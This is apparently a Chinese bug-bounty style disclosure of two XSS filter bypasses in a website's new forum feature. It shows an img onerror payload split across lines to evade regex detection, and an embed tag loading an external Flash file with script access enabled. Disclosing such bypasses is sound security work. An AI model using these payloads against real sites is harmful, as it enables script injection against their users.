### 简要描述:
rt
### 详细说明:
看到出了论坛这个新功能
xss过滤还是不够哦。
两处问题。
发布帖子处,
#1 正则貌似有问题。
```
<img src=x
onerror
=alert(1)>
```
换行就绕过了对 onxxx的检测。
[<img src="https://images.seebug.org/upload/201501/10171122a45577cced3245ab2cf6fd4ba2da2e91.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171122a45577cced3245ab2cf6fd4ba2da2e91.jpg)
[<img src="https://images.seebug.org/upload/201501/10171131e31a44e87748449b749486886f3e5697.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171131e31a44e87748449b749486886f3e5697.png)
#2 <embed>
测试代码
```
<embed src="http://cm2.in/xss.swf" allownetworking="all"
allowscriptaccess="always">
```
[<img src="https://images.seebug.org/upload/201501/101712293924adbbe4f21061ea6a4b24efdb50fe.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101712293924adbbe4f21061ea6a4b24efdb50fe.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201501/101712293924adbbe4f21061ea6a4b24efdb50fe.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101712293924adbbe4f21061ea6a4b24efdb50fe.png)
京公网安备 11010502034610号
暂无评论